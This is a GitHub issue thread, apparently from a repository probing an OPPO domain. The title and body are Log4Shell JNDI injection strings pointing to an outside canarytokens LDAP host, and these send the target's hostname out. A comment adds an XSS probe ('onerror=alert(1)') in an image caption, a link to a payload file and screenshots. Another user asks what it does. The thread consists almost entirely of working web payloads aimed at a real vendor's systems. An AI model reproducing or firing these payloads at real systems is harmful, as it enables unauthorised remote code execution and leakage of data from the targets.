### ISSUE TITLE
${jndi:ldap://x${hostName}.L4J.hmp5v45o87cujzepes9n5fur5.canarytokens.com/a}

### ISSUE THREAD

**Issue by rohandevikar666** [rohandevikar666/oms.oppomobile.com#1]
${jndi:ldap://x${hostName}.L4J.hmp5v45o87cujzepes9n5fur5.canarytokens.com/a}`${jndi:ldap://x${hostName}.L4J.hmp5v45o87cujzepes9n5fur5.canarytokens.com/a}`

**Comment by rohandevikar666** [comment]
![Screenshot from 2021-12-18 16-21-18](https://user-images.githubusercontent.com/95624672/146922732-9fe5f409-90c4-4845-82c6-c3cc910597da.png)
![Screenshot from 2021-12-15 19-10-12](https://user-images.githubusercontent.com/95624672/146922737-62f433d3-f77f-4cce-b50d-f67c41ae913e.png)
![textarea img src=x onerror=alert(1)](https://user-images.githubusercontent.com/95624672/146922738-e16f2159-a831-42db-a7c5-112a1decc818.png)
[payload.txt](https://github.com/rohandevikar666/oms.oppomobile.com/files/7754754/payload.txt)

**Comment by TrentTrentTrent** [comment]
what does that do LOL
